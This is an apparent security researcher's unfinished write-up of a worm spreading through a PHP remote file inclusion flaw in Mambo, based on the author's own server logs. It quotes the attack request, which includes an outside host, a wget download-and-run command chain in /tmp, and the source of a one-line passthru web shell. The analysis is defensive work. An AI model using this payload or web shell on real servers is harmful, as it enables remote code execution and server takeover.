by Javantea aka. Joel R. Voss
Analysis: Jun 16, 2004
Write-up: Sept 8, 2006
Botnets
Mambo Official Homepage
A worm is currently spreading which targets a vulnerability in Mambo. The worm uses simple techniques to spread and leaves a mark on servers that do not have Mambo installed. The vulnerability is caused by a feature in PHP that allows remote inclusion of files. This allows arbitrary remote execution of PHP code. The payload is currently not known.
Server logs from suzy.altsci.com (a development server) showed obvious signs of exploit attempts. Looking closer, it gives us markers that identify it as a Mambo worm. The virus includes cmd.gif from a remote site, which simply executes arbitrary commands in a shell using the passthru function. The command that it executes quite simply grabs the payload and then executes it.
210.202.197.100 - - [11/Jun/2006:11:37:57 -0700]
"GET /index2.php?option=com_content&do_pdf=1&
id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&
GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&
cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;
echo%20YYY;echo| HTTP/1.1" 404 284
cmd.gif Source:
<?php // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) passthru($_GET['cmd'] . " 2>&1"); ?<Commands Executed:
cd /tmp wget 72.18.195.161/lnikon chmod 744 lnikon ./lnikon echo YYY echo|
Unfinished.
Unfinished.